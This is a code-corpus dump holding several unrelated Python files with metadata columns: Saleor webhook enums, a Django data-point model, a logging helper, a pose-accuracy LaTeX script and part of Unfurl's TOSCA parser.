bars = self.fetch_intraday_quotes(symbol=symbol, frequency=frequency, field=None, since_last_quote_time=since_last_quote_time)
if len(bars) > 0 and not np.isnan(float(bars.iloc[0]['close'])):
before_date = bars.iloc[-1]['date']
if len(bars) > 0 and np.isnan(float(bars.iloc[0]['close'])):
bars = bars.drop([bars.index[0]])
if bars is None or len(bars) < bar_count:
new_bars = self.iex.get_quote_intraday_hist_by_bars(symbol=symbol, minute_series=self.allowed_history_frequency[frequency], bars=bar_count, before_date=before_date)
if bars is None:
bars = new_bars
else:
bars = new_bars.append(bars)
bars.sort_index(inplace=True)
if field:
bars = bars[field]
return bars
bars = self.iex.get_quote_daily(symbol=symbol, bars=bar_count)
if field:
bars = bars[field]
return bars
| true | true |
f7fa51a2f1515c96d15ae82974a5e496920259f6 | 6,062 | py | Python | saleor/graphql/webhook/enums.py | DustinBracy/saleor | 625d4f704721bd771a8ba8f06a44f83c18f2a090 | [
"CC-BY-4.0"
] | null | null | null | saleor/graphql/webhook/enums.py | DustinBracy/saleor | 625d4f704721bd771a8ba8f06a44f83c18f2a090 | [
"CC-BY-4.0"
] | null | null | null | saleor/graphql/webhook/enums.py | DustinBracy/saleor | 625d4f704721bd771a8ba8f06a44f83c18f2a090 | [
"CC-BY-4.0"
] | null | null | null | import graphene
from ...webhook.event_types import WebhookEventAsyncType, WebhookEventSyncType
from ..core.utils import str_to_enum
checkout_updated_event_enum_description = (
"A checkout is updated. It also triggers all updates related to the checkout."
)
order_confirmed_event_enum_description = (
"An order is confirmed (status change unconfirmed -> unfulfilled) "
"by a staff user using the OrderConfirm mutation. "
"It also triggers when the user completes the checkout and the shop "
"setting `automatically_confirm_all_new_orders` is enabled."
)
order_fully_paid_event_enum_description = "Payment is made and an order is fully paid."
order_updated_event_enum_description = (
"An order is updated; triggered for all changes related to an order; "
"covers all other order webhooks, except for ORDER_CREATED."
)
WEBHOOK_EVENT_DESCRIPTION = {
WebhookEventAsyncType.CATEGORY_CREATED: "A new category created.",
WebhookEventAsyncType.CATEGORY_UPDATED: "A category is updated.",
WebhookEventAsyncType.CATEGORY_DELETED: "A category is deleted.",
WebhookEventAsyncType.CHANNEL_CREATED: "A new channel created.",
WebhookEventAsyncType.CHANNEL_UPDATED: "A channel is updated.",
WebhookEventAsyncType.CHANNEL_DELETED: "A channel is deleted.",
WebhookEventAsyncType.CHANNEL_STATUS_CHANGED: "A channel status is changed.",
WebhookEventAsyncType.CHECKOUT_CREATED: "A new checkout is created.",
WebhookEventAsyncType.CHECKOUT_UPDATED: checkout_updated_event_enum_description,
WebhookEventAsyncType.COLLECTION_CREATED: "A new collection is created.",
WebhookEventAsyncType.COLLECTION_UPDATED: "A collection is updated.",
WebhookEventAsyncType.COLLECTION_DELETED: "A collection is deleted.",
WebhookEventAsyncType.CUSTOMER_CREATED: "A new customer account is created.",
WebhookEventAsyncType.CUSTOMER_UPDATED: "A customer account is updated.",
WebhookEventAsyncType.GIFT_CARD_CREATED: "A new gift card created.",
WebhookEventAsyncType.GIFT_CARD_UPDATED: "A gift card is updated.",
WebhookEventAsyncType.GIFT_CARD_DELETED: "A gift card is deleted.",
WebhookEventAsyncType.GIFT_CARD_STATUS_CHANGED: "A gift card status is changed.",
WebhookEventAsyncType.INVOICE_REQUESTED: "An invoice for order requested.",
WebhookEventAsyncType.INVOICE_DELETED: "An invoice is deleted.",
WebhookEventAsyncType.INVOICE_SENT: "Invoice has been sent.",
WebhookEventAsyncType.MENU_CREATED: "A new menu created.",
WebhookEventAsyncType.MENU_UPDATED: "A menu is updated.",
WebhookEventAsyncType.MENU_DELETED: "A menu is deleted.",
WebhookEventAsyncType.MENU_ITEM_CREATED: "A new menu item created.",
WebhookEventAsyncType.MENU_ITEM_UPDATED: "A menu item is updated.",
WebhookEventAsyncType.MENU_ITEM_DELETED: "A menu item is deleted.",
WebhookEventAsyncType.NOTIFY_USER: "User notification triggered.",
WebhookEventAsyncType.ORDER_CREATED: "A new order is placed.",
WebhookEventAsyncType.ORDER_CONFIRMED: order_confirmed_event_enum_description,
WebhookEventAsyncType.ORDER_FULLY_PAID: order_fully_paid_event_enum_description,
WebhookEventAsyncType.ORDER_UPDATED: order_updated_event_enum_description,
WebhookEventAsyncType.ORDER_CANCELLED: "An order is cancelled.",
WebhookEventAsyncType.ORDER_FULFILLED: "An order is fulfilled.",
WebhookEventAsyncType.FULFILLMENT_CREATED: "A new fulfillment is created.",
WebhookEventAsyncType.FULFILLMENT_CANCELED: "A fulfillment is cancelled.",
WebhookEventAsyncType.PAGE_CREATED: "A new page is created.",
WebhookEventAsyncType.PAGE_UPDATED: "A page is updated.",
WebhookEventAsyncType.PAGE_DELETED: "A page is deleted.",
WebhookEventAsyncType.PRODUCT_CREATED: "A new product is created.",
WebhookEventAsyncType.PRODUCT_UPDATED: "A product is updated.",
WebhookEventAsyncType.PRODUCT_DELETED: "A product is deleted.",
WebhookEventAsyncType.PRODUCT_VARIANT_CREATED: "A new product variant is created.",
WebhookEventAsyncType.PRODUCT_VARIANT_UPDATED: "A product variant is updated.",
WebhookEventAsyncType.PRODUCT_VARIANT_DELETED: "A product variant is deleted.",
WebhookEventAsyncType.SHIPPING_PRICE_CREATED: "A new shipping price is created.",
WebhookEventAsyncType.SHIPPING_PRICE_UPDATED: "A shipping price is updated.",
WebhookEventAsyncType.SHIPPING_PRICE_DELETED: "A shipping price is deleted.",
WebhookEventAsyncType.SHIPPING_ZONE_CREATED: "A new shipping zone is created.",
WebhookEventAsyncType.SHIPPING_ZONE_UPDATED: "A shipping zone is updated.",
WebhookEventAsyncType.SHIPPING_ZONE_DELETED: "A shipping zone is deleted.",
WebhookEventAsyncType.VOUCHER_CREATED: "A new voucher created.",
WebhookEventAsyncType.VOUCHER_UPDATED: "A voucher is updated.",
WebhookEventAsyncType.VOUCHER_DELETED: "A voucher is deleted.",
WebhookEventAsyncType.ANY: "All the events.",
}
def description(enum):
if enum:
return WEBHOOK_EVENT_DESCRIPTION.get(enum.value)
return "Enum determining type of webhook."
WebhookEventTypeEnum = graphene.Enum(
"WebhookEventTypeEnum",
[
(str_to_enum(e_type[0]), e_type[0])
for e_type in (WebhookEventAsyncType.CHOICES + WebhookEventSyncType.CHOICES)
],
description=description,
)
WebhookEventTypeAsyncEnum = graphene.Enum(
"WebhookEventTypeAsyncEnum",
[(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventAsyncType.CHOICES],
description=description,
)
WebhookEventTypeSyncEnum = graphene.Enum(
"WebhookEventTypeSyncEnum",
[(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventSyncType.CHOICES],
description=description,
)
WebhookSampleEventTypeEnum = graphene.Enum(
"WebhookSampleEventTypeEnum",
[
(str_to_enum(e_type[0]), e_type[0])
for e_type in WebhookEventAsyncType.CHOICES
if e_type[0] != WebhookEventAsyncType.ANY
],
)
class EventDeliveryStatusEnum(graphene.Enum):
PENDING = "pending"
SUCCESS = "success"
FAILED = "failed"
| 48.111111 | 87 | 0.776641 | import graphene
from ...webhook.event_types import WebhookEventAsyncType, WebhookEventSyncType
from ..core.utils import str_to_enum
checkout_updated_event_enum_description = (
"A checkout is updated. It also triggers all updates related to the checkout."
)
order_confirmed_event_enum_description = (
"An order is confirmed (status change unconfirmed -> unfulfilled) "
"by a staff user using the OrderConfirm mutation. "
"It also triggers when the user completes the checkout and the shop "
"setting `automatically_confirm_all_new_orders` is enabled."
)
order_fully_paid_event_enum_description = "Payment is made and an order is fully paid."
order_updated_event_enum_description = (
"An order is updated; triggered for all changes related to an order; "
"covers all other order webhooks, except for ORDER_CREATED."
)
WEBHOOK_EVENT_DESCRIPTION = {
WebhookEventAsyncType.CATEGORY_CREATED: "A new category created.",
WebhookEventAsyncType.CATEGORY_UPDATED: "A category is updated.",
WebhookEventAsyncType.CATEGORY_DELETED: "A category is deleted.",
WebhookEventAsyncType.CHANNEL_CREATED: "A new channel created.",
WebhookEventAsyncType.CHANNEL_UPDATED: "A channel is updated.",
WebhookEventAsyncType.CHANNEL_DELETED: "A channel is deleted.",
WebhookEventAsyncType.CHANNEL_STATUS_CHANGED: "A channel status is changed.",
WebhookEventAsyncType.CHECKOUT_CREATED: "A new checkout is created.",
WebhookEventAsyncType.CHECKOUT_UPDATED: checkout_updated_event_enum_description,
WebhookEventAsyncType.COLLECTION_CREATED: "A new collection is created.",
WebhookEventAsyncType.COLLECTION_UPDATED: "A collection is updated.",
WebhookEventAsyncType.COLLECTION_DELETED: "A collection is deleted.",
WebhookEventAsyncType.CUSTOMER_CREATED: "A new customer account is created.",
WebhookEventAsyncType.CUSTOMER_UPDATED: "A customer account is updated.",
WebhookEventAsyncType.GIFT_CARD_CREATED: "A new gift card created.",
WebhookEventAsyncType.GIFT_CARD_UPDATED: "A gift card is updated.",
WebhookEventAsyncType.GIFT_CARD_DELETED: "A gift card is deleted.",
WebhookEventAsyncType.GIFT_CARD_STATUS_CHANGED: "A gift card status is changed.",
WebhookEventAsyncType.INVOICE_REQUESTED: "An invoice for order requested.",
WebhookEventAsyncType.INVOICE_DELETED: "An invoice is deleted.",
WebhookEventAsyncType.INVOICE_SENT: "Invoice has been sent.",
WebhookEventAsyncType.MENU_CREATED: "A new menu created.",
WebhookEventAsyncType.MENU_UPDATED: "A menu is updated.",
WebhookEventAsyncType.MENU_DELETED: "A menu is deleted.",
WebhookEventAsyncType.MENU_ITEM_CREATED: "A new menu item created.",
WebhookEventAsyncType.MENU_ITEM_UPDATED: "A menu item is updated.",
WebhookEventAsyncType.MENU_ITEM_DELETED: "A menu item is deleted.",
WebhookEventAsyncType.NOTIFY_USER: "User notification triggered.",
WebhookEventAsyncType.ORDER_CREATED: "A new order is placed.",
WebhookEventAsyncType.ORDER_CONFIRMED: order_confirmed_event_enum_description,
WebhookEventAsyncType.ORDER_FULLY_PAID: order_fully_paid_event_enum_description,
WebhookEventAsyncType.ORDER_UPDATED: order_updated_event_enum_description,
WebhookEventAsyncType.ORDER_CANCELLED: "An order is cancelled.",
WebhookEventAsyncType.ORDER_FULFILLED: "An order is fulfilled.",
WebhookEventAsyncType.FULFILLMENT_CREATED: "A new fulfillment is created.",
WebhookEventAsyncType.FULFILLMENT_CANCELED: "A fulfillment is cancelled.",
WebhookEventAsyncType.PAGE_CREATED: "A new page is created.",
WebhookEventAsyncType.PAGE_UPDATED: "A page is updated.",
WebhookEventAsyncType.PAGE_DELETED: "A page is deleted.",
WebhookEventAsyncType.PRODUCT_CREATED: "A new product is created.",
WebhookEventAsyncType.PRODUCT_UPDATED: "A product is updated.",
WebhookEventAsyncType.PRODUCT_DELETED: "A product is deleted.",
WebhookEventAsyncType.PRODUCT_VARIANT_CREATED: "A new product variant is created.",
WebhookEventAsyncType.PRODUCT_VARIANT_UPDATED: "A product variant is updated.",
WebhookEventAsyncType.PRODUCT_VARIANT_DELETED: "A product variant is deleted.",
WebhookEventAsyncType.SHIPPING_PRICE_CREATED: "A new shipping price is created.",
WebhookEventAsyncType.SHIPPING_PRICE_UPDATED: "A shipping price is updated.",
WebhookEventAsyncType.SHIPPING_PRICE_DELETED: "A shipping price is deleted.",
WebhookEventAsyncType.SHIPPING_ZONE_CREATED: "A new shipping zone is created.",
WebhookEventAsyncType.SHIPPING_ZONE_UPDATED: "A shipping zone is updated.",
WebhookEventAsyncType.SHIPPING_ZONE_DELETED: "A shipping zone is deleted.",
WebhookEventAsyncType.VOUCHER_CREATED: "A new voucher created.",
WebhookEventAsyncType.VOUCHER_UPDATED: "A voucher is updated.",
WebhookEventAsyncType.VOUCHER_DELETED: "A voucher is deleted.",
WebhookEventAsyncType.ANY: "All the events.",
}
def description(enum):
if enum:
return WEBHOOK_EVENT_DESCRIPTION.get(enum.value)
return "Enum determining type of webhook."
WebhookEventTypeEnum = graphene.Enum(
"WebhookEventTypeEnum",
[
(str_to_enum(e_type[0]), e_type[0])
for e_type in (WebhookEventAsyncType.CHOICES + WebhookEventSyncType.CHOICES)
],
description=description,
)
WebhookEventTypeAsyncEnum = graphene.Enum(
"WebhookEventTypeAsyncEnum",
[(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventAsyncType.CHOICES],
description=description,
)
WebhookEventTypeSyncEnum = graphene.Enum(
"WebhookEventTypeSyncEnum",
[(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventSyncType.CHOICES],
description=description,
)
WebhookSampleEventTypeEnum = graphene.Enum(
"WebhookSampleEventTypeEnum",
[
(str_to_enum(e_type[0]), e_type[0])
for e_type in WebhookEventAsyncType.CHOICES
if e_type[0] != WebhookEventAsyncType.ANY
],
)
class EventDeliveryStatusEnum(graphene.Enum):
PENDING = "pending"
SUCCESS = "success"
FAILED = "failed"
| true | true |
f7fa51cf7ef754862417bcd19836f12f0cc023d0 | 1,048 | py | Python | Hydro/datapoint/models.py | p-v-o-s/hydro | 34eaf227043c69b921650aa120516533d61c6854 | [
"BSD-3-Clause"
] | null | null | null | Hydro/datapoint/models.py | p-v-o-s/hydro | 34eaf227043c69b921650aa120516533d61c6854 | [
"BSD-3-Clause"
] | null | null | null | Hydro/datapoint/models.py | p-v-o-s/hydro | 34eaf227043c69b921650aa120516533d61c6854 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from django.utils.translation import gettext_lazy as _
from Hydro.device.models import Device
class Point(models.Model):
_lat = models.DecimalField(_("Latitude"), max_digits=12, decimal_places=9)
_lng = models.DecimalField(_("Longitude"), max_digits=12, decimal_places=9)
def __str__(self):
return "{},{}".format(self._lat, self._lng)
class DataPoint(models.Model):
device = models.ForeignKey(Device, on_delete=models.CASCADE)
location = models.ForeignKey(Point, on_delete=models.CASCADE, null=True)
added_at = models.DateTimeField(_("Added at"), auto_now_add=True)
collected_at = models.DateTimeField(_("Collected at"))
data = models.IntegerField(_("Data"))
type = models.CharField(_("Type"), max_length=50, blank=True)
extra = models.TextField(_("Extra"), blank=True)
def get_absolute_url(self):
pass
def __str__(self):
return "{} ==> {}".format(self.type, self.data)
@property
def owner(self):
return self.device.owner
| 31.757576 | 79 | 0.695611 | from django.db import models
from django.utils.translation import gettext_lazy as _
from Hydro.device.models import Device
class Point(models.Model):
_lat = models.DecimalField(_("Latitude"), max_digits=12, decimal_places=9)
_lng = models.DecimalField(_("Longitude"), max_digits=12, decimal_places=9)
def __str__(self):
return "{},{}".format(self._lat, self._lng)
class DataPoint(models.Model):
device = models.ForeignKey(Device, on_delete=models.CASCADE)
location = models.ForeignKey(Point, on_delete=models.CASCADE, null=True)
added_at = models.DateTimeField(_("Added at"), auto_now_add=True)
collected_at = models.DateTimeField(_("Collected at"))
data = models.IntegerField(_("Data"))
type = models.CharField(_("Type"), max_length=50, blank=True)
extra = models.TextField(_("Extra"), blank=True)
def get_absolute_url(self):
pass
def __str__(self):
return "{} ==> {}".format(self.type, self.data)
@property
def owner(self):
return self.device.owner
| true | true |
f7fa51e6dd823c589d63187f0513757e034c6cb0 | 1,142 | py | Python | scripts/qclog.py | pizzathief/PyFluxPro | c075c0040b4a9d6c9ab75ca1cef158f1307f8396 | [
"BSD-3-Clause"
] | null | null | null | scripts/qclog.py | pizzathief/PyFluxPro | c075c0040b4a9d6c9ab75ca1cef158f1307f8396 | [
"BSD-3-Clause"
] | null | null | null | scripts/qclog.py | pizzathief/PyFluxPro | c075c0040b4a9d6c9ab75ca1cef158f1307f8396 | [
"BSD-3-Clause"
] | null | null | null | import logging
import os
def init_logger(logger_name="pfp_log", file_handler="pfp.log"):
"""
Purpose:
Returns a logger object.
Usage:
logger = qclog.init_logger()
Author: PRI with acknowledgement to James Cleverly
Date: September 2016
"""
logger = logging.getLogger(name=logger_name)
logger.setLevel(logging.DEBUG)
# create file handler
#max_bytes = 1024 * 1024 * 2
#fh = logging.handlers.RotatingFileHandler(os.path.join("logfiles", 'pfp.log'), mode="a", maxBytes=max_bytes, backupCount=1)
if not os.path.exists("logfiles"):
os.makedirs("logfiles")
log_file_path = os.path.join("logfiles", file_handler)
fh = logging.FileHandler(log_file_path)
fh.setLevel(logging.DEBUG)
# create console handler
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
# create formatter and add to handlers
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s','%H:%M:%S')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
return logger
| 32.628571 | 128 | 0.687391 | import logging
import os
def init_logger(logger_name="pfp_log", file_handler="pfp.log"):
logger = logging.getLogger(name=logger_name)
logger.setLevel(logging.DEBUG)
if not os.path.exists("logfiles"):
os.makedirs("logfiles")
log_file_path = os.path.join("logfiles", file_handler)
fh = logging.FileHandler(log_file_path)
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s','%H:%M:%S')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
return logger
| true | true |
f7fa54f709934dc22d84619d9c426e01818e5efb | 1,488 | py | Python | topview/results/make_latex_accuracies.py | mmlab-cv/ICIP-2021-2346 | d208a5b89acfb0405475664bc83d289d5c3eae33 | [
"MIT"
] | 1 | 2021-08-20T11:47:33.000Z | 2021-08-20T11:47:33.000Z | topview/results/make_latex_accuracies.py | mmlab-cv/ICIP-2021-2346 | d208a5b89acfb0405475664bc83d289d5c3eae33 | [
"MIT"
] | null | null | null | topview/results/make_latex_accuracies.py | mmlab-cv/ICIP-2021-2346 | d208a5b89acfb0405475664bc83d289d5c3eae33 | [
"MIT"
] | null | null | null | import sys
sys.path.append('../../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pathlib
from accuracy import *
from plot import *
def get_accuracy_for_joints(experiment, needed_acc = 0.1):
current_file_path = pathlib.Path(__file__).parent.absolute()
gt_file = f'{current_file_path}/res_files/{experiment}_gt.txt'
pred_file = f'{current_file_path}/res_files/{experiment}_predictions.txt'
gt = np.loadtxt(gt_file)
gt = gt.reshape(gt.shape[0], -1, 3)
pred = np.loadtxt(pred_file)
pred = pred.reshape(pred.shape[0], -1, 3)
dist, acc = compute_dist_acc_wrapper(pred, gt, max_dist=0.3, num=100)
acc_ind = np.where(dist == needed_acc)
return acc[:, acc_ind].flatten()
def create_accuracy_df_for_experiments(needed_acc = 0.1):
results_acc = []
for exp in ["itop_itop_itop", "itop_itop_panoptic", "itop_both_panoptic", "panoptic_panoptic_panoptic", "panoptic_panoptic_itop", "panoptic_both_itop", "both_both_itop", "both_both_panoptic"]:
exp_acc = get_accuracy_for_joints(exp, needed_acc)
res_acc = {f"j{i+1}": el for i, el in enumerate(exp_acc)}
res_acc = {
"experiment": exp,
**res_acc,
}
results_acc.append(res_acc)
df = pd.DataFrame(results_acc)
df = df.round(3)
return df
print("0.1m")
print(create_accuracy_df_for_experiments(0.1).to_latex())
print("0.2m")
print(create_accuracy_df_for_experiments(0.2).to_latex()) | 32.347826 | 196 | 0.691532 | import sys
sys.path.append('../../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pathlib
from accuracy import *
from plot import *
def get_accuracy_for_joints(experiment, needed_acc = 0.1):
current_file_path = pathlib.Path(__file__).parent.absolute()
gt_file = f'{current_file_path}/res_files/{experiment}_gt.txt'
pred_file = f'{current_file_path}/res_files/{experiment}_predictions.txt'
gt = np.loadtxt(gt_file)
gt = gt.reshape(gt.shape[0], -1, 3)
pred = np.loadtxt(pred_file)
pred = pred.reshape(pred.shape[0], -1, 3)
dist, acc = compute_dist_acc_wrapper(pred, gt, max_dist=0.3, num=100)
acc_ind = np.where(dist == needed_acc)
return acc[:, acc_ind].flatten()
def create_accuracy_df_for_experiments(needed_acc = 0.1):
results_acc = []
for exp in ["itop_itop_itop", "itop_itop_panoptic", "itop_both_panoptic", "panoptic_panoptic_panoptic", "panoptic_panoptic_itop", "panoptic_both_itop", "both_both_itop", "both_both_panoptic"]:
exp_acc = get_accuracy_for_joints(exp, needed_acc)
res_acc = {f"j{i+1}": el for i, el in enumerate(exp_acc)}
res_acc = {
"experiment": exp,
**res_acc,
}
results_acc.append(res_acc)
df = pd.DataFrame(results_acc)
df = df.round(3)
return df
print("0.1m")
print(create_accuracy_df_for_experiments(0.1).to_latex())
print("0.2m")
print(create_accuracy_df_for_experiments(0.2).to_latex()) | true | true |
f7fa556c98600aa30c24a77fbda4680bcccf435c | 49,810 | py | Python | unfurl/tosca.py | onecommons/giterop | 9d9c6730ac5bce63f26dd1fd1e151006bc8230dd | [
"MIT"
] | null | null | null | unfurl/tosca.py | onecommons/giterop | 9d9c6730ac5bce63f26dd1fd1e151006bc8230dd | [
"MIT"
] | null | null | null | unfurl/tosca.py | onecommons/giterop | 9d9c6730ac5bce63f26dd1fd1e151006bc8230dd | [
"MIT"
] | null | null | null | # Copyright (c) 2020 Adam Souzis
# SPDX-License-Identifier: MIT
"""
TOSCA implementation
"""
import functools
import copy
from .tosca_plugins import TOSCA_VERSION
from .util import UnfurlError, UnfurlValidationError, get_base_dir, check_class_registry
from .eval import Ref, RefContext, map_value
from .result import ResourceRef, ResultsList
from .merge import patch_dict, merge_dicts
from .logs import get_console_log_level
from toscaparser.tosca_template import ToscaTemplate
from toscaparser.properties import Property
from toscaparser.elements.entity_type import EntityType
from toscaparser.elements.statefulentitytype import StatefulEntityType
import toscaparser.workflow
import toscaparser.imports
import toscaparser.artifacts
from toscaparser.common.exception import ExceptionCollector
import six
import logging
import re
from ruamel.yaml.comments import CommentedMap
logger = logging.getLogger("unfurl")
from toscaparser import functions
class RefFunc(functions.Function):
def result(self):
return {self.name: self.args}
def validate(self):
pass
for func in ["eval", "ref", "get_artifact", "has_env", "get_env"]:
functions.function_mappings[func] = RefFunc
toscaIsFunction = functions.is_function
def is_function(function):
return toscaIsFunction(function) or Ref.is_ref(function)
functions.is_function = is_function
def validate_unfurl_identifier(name):
# should match NamedObject in unfurl json schema
return re.match(r"^[A-Za-z._][A-Za-z0-9._:\-]*$", name) is not None
def encode_unfurl_identifier(name):
def encode(match):
return f"-{ord(match.group(0))}-"
return re.sub(r"[^A-Za-z0-9._:\-]", encode, name)
def decode_unfurl_identifier(name):
def decode(match):
return chr(int(match.group(1)))
return re.sub(r"-([0-9]+)-", decode, name)
def find_standard_interface(op):
if op in StatefulEntityType.interfaces_node_lifecycle_operations:
return "Standard"
elif op in ["check", "discover", "revert"]:
return "Install"
elif op in StatefulEntityType.interfaces_relationship_configure_operations:
return "Configure"
else:
return ""
@functools.lru_cache(maxsize=None)
def create_default_topology():
tpl = dict(
tosca_definitions_version=TOSCA_VERSION,
topology_template=dict(
node_templates={"_default": {"type": "tosca.nodes.Root"}},
relationship_templates={"_default": {"type": "tosca.relationships.Root"}},
),
)
return ToscaTemplate(yaml_dict_tpl=tpl)
def _patch(node, patchsrc, quote=False, tpl=None):
if tpl is None:
tpl = node.toscaEntityTemplate.entity_tpl
ctx = RefContext(node, dict(template=tpl))
ctx.base_dir = getattr(patchsrc, "base_dir", ctx.base_dir)
if quote:
patch = copy.deepcopy(patchsrc)
else:
patch = map_value(patchsrc, ctx)
logger.trace("patching node %s was %s", node.name, tpl)
patched = patch_dict(tpl, patch, True)
logger.trace("patched node %s: now %s", node.name, patched)
return patched
class ToscaSpec:
InstallerType = "unfurl.nodes.Installer"
topology = None
def evaluate_imports(self, toscaDef):
if not toscaDef.get("imports"):
return False
modified = []
for import_tpl in toscaDef["imports"]:
if not isinstance(import_tpl, dict) or "when" not in import_tpl:
modified.append(import_tpl)
continue
match = Ref(import_tpl["when"]).resolve_one(
RefContext(self.topology, trace=0)
)
if match:
logger.debug(
"include import of %s, match found for %s",
import_tpl["file"],
import_tpl["when"],
)
modified.append(import_tpl)
else:
logger.verbose(
"skipping import of %s, no match for %s",
import_tpl["file"],
import_tpl["when"],
)
if len(modified) < len(toscaDef["imports"]):
toscaDef["imports"] = modified
return True
return False
def enforce_filters(self):
patched = False
for nodespec in self.nodeTemplates.values():
for req in nodespec.requirements.values():
for prop, value in req.get_nodefilter_properties():
# annotate the target's properties
target = req.relationship and req.relationship.target
if target and isinstance(value, dict) and 'eval' in value:
value.setdefault('vars', {})['SOURCE'] = dict(eval="::"+nodespec.name)
patch = dict(properties={prop: value})
_patch(target, patch, quote=True)
patched = True
for name, value in req.get_nodefilter_requirements():
# annotate the target's requirements
target = req.relationship and req.relationship.target
if target:
matching_target_req = target.requirements.get(name)
_patch(nodespec, value, tpl=matching_target_req.entity_tpl[name])
patched = True
return patched
def _overlay(self, overlays):
def _find_matches():
ExceptionCollector.start() # clears previous errors
for expression, _tpl in overlays.items():
try:
match = Ref(expression).resolve_one(
RefContext(self.topology, trace=0)
)
if not match:
continue
if isinstance(match, (list, ResultsList)):
for item in match:
yield (item, _tpl)
else:
yield (match, _tpl)
except:
ExceptionCollector.appendException(
UnfurlValidationError(
f'error evaluating decorator match expression "{expression}"',
log=True,
)
)
matches = list(_find_matches())
return [_patch(*m) for m in matches]
def _parse_template(self, path, inputs, toscaDef, resolver):
# need to set a path for the import loader
self.template = ToscaTemplate(
path=path,
parsed_params=inputs,
yaml_dict_tpl=toscaDef,
import_resolver=resolver,
verify=False, # we display the error messages ourselves so we don't need to verify here
)
ExceptionCollector.collecting = True # don't stop collecting validation errors
ExceptionCollector.near = ' while instantiating the spec'
self.nodeTemplates = {}
self.installers = {}
self.relationshipTemplates = {}
for template in self.template.nodetemplates:
if not template.type_definition:
continue # invalidate template
nodeTemplate = NodeSpec(template, self)
if template.is_derived_from(self.InstallerType):
self.installers[template.name] = nodeTemplate
self.nodeTemplates[template.name] = nodeTemplate
if hasattr(self.template, "relationship_templates"):
# user-declared RelationshipTemplates, source and target will be None
for template in self.template.relationship_templates:
relTemplate = RelationshipSpec(template, self)
self.relationshipTemplates[template.name] = relTemplate
self.load_imported_default_templates()
self.topology = TopologySpec(self, inputs)
substitution_mappings = self.template.topology_template.substitution_mappings
if substitution_mappings and substitution_mappings.node:
self.substitution_template = self.nodeTemplates.get(substitution_mappings.node)
else:
self.substitution_template = None
self.load_workflows()
self.groups = {
g.name: GroupSpec(g, self) for g in self.template.topology_template.groups
}
self.policies = {
p.name: PolicySpec(p, self)
for p in self.template.topology_template.policies
}
ExceptionCollector.collecting = False
def _patch(self, toscaDef, path):
matches = None
decorators = self.load_decorators()
if decorators:
logger.debug("applying decorators %s", decorators)
# copy errors before we clear them in _overlay
errorsSoFar = ExceptionCollector.exceptions[:]
# overlay uses ExceptionCollector
matches = self._overlay(decorators)
if ExceptionCollector.exceptionsCaught():
# abort if overlay caused errors
# report previously collected errors too
ExceptionCollector.exceptions[:0] = errorsSoFar
message = "\n".join(
ExceptionCollector.getExceptionsReport(
full=(get_console_log_level() < logging.INFO)
)
)
raise UnfurlValidationError(
f"TOSCA validation failed for {path}: \n{message}",
ExceptionCollector.getExceptions(),
)
modified_imports = self.evaluate_imports(toscaDef)
annotated = self.enforce_filters()
return matches or modified_imports or annotated
def __init__(
self, toscaDef, spec=None, path=None, resolver=None, skip_validation=False
):
self.discovered = None
if spec:
inputs = spec.get("inputs")
else:
inputs = None
if isinstance(toscaDef, ToscaTemplate):
self.template = toscaDef
else:
self.template = None
topology_tpl = toscaDef.get("topology_template")
if not topology_tpl:
toscaDef["topology_template"] = dict(
node_templates={}, relationship_templates={}
)
if spec:
self.load_instances(toscaDef, spec)
logger.info("Validating TOSCA template at %s", path)
try:
self._parse_template(path, inputs, toscaDef, resolver)
except:
if not ExceptionCollector.exceptionsCaught() or not self.template or not self.topology:
raise # unexpected error
patched = self._patch(toscaDef, path)
if patched:
# overlay and evaluate_imports modifies tosaDef in-place, try reparsing it
self._parse_template(path, inputs, toscaDef, resolver)
if ExceptionCollector.exceptionsCaught():
message = "\n".join(
ExceptionCollector.getExceptionsReport(
full=(get_console_log_level() < logging.INFO)
)
)
if skip_validation:
logger.warning("Found TOSCA validation failures: %s", message)
else:
raise UnfurlValidationError(
f"TOSCA validation failed for {path}: \n{message}",
ExceptionCollector.getExceptions(),
)
@property
def base_dir(self):
if self.template.path is None:
return None
return get_base_dir(self.template.path)
def _get_project_dir(self, home=False):
# hacky
if self.template.import_resolver:
manifest = self.template.import_resolver.manifest
if manifest.localEnv:
if home:
if manifest.localEnv.homeProject:
return manifest.localEnv.homeProject.projectRoot
elif manifest.localEnv.project:
return manifest.localEnv.project.projectRoot
return None
def add_node_template(self, name, tpl, discovered=True):
custom_types = None
if "custom_types" in tpl:
custom_types = tpl.pop("custom_types")
if custom_types:
# XXX check for conflicts, throw error
self.template.topology_template.custom_defs.update(custom_types)
nodeTemplate = self.template.topology_template.add_template(name, tpl)
nodeSpec = NodeSpec(nodeTemplate, self)
self.nodeTemplates[name] = nodeSpec
if discovered:
if self.discovered is None:
self.discovered = CommentedMap()
self.discovered[name] = tpl
# add custom_types back for serialization later
if custom_types:
tpl["custom_types"] = custom_types
return nodeSpec
def load_decorators(self):
decorators = CommentedMap()
for path, import_tpl in self.template.nested_tosca_tpls.items():
imported = import_tpl.get("decorators")
if imported:
decorators = merge_dicts(decorators, imported)
decorators = merge_dicts(decorators, self.template.tpl.get("decorators") or {})
return decorators
def load_imported_default_templates(self):
for name, topology in self.template.nested_topologies.items():
for nodeTemplate in topology.nodetemplates:
if (
"default" in nodeTemplate.directives
and nodeTemplate.name not in self.nodeTemplates
):
nodeSpec = NodeSpec(nodeTemplate, self)
self.nodeTemplates[nodeSpec.name] = nodeSpec
def load_workflows(self):
# we want to let different types defining standard workflows like deploy
# so we need to support importing workflows
workflows = {
name: [Workflow(w)]
for name, w in self.template.topology_template.workflows.items()
}
for topology in self.template.nested_topologies.values():
for name, w in topology.workflows.items():
workflows.setdefault(name, []).append(Workflow(w))
self._workflows = workflows
